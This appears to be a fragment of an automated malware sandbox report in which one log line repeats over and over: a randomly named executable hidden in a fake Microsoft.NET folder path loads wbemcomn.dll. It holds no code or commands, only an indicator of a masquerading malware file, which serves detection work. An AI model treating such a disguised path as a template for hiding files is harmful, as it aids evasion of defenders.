Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
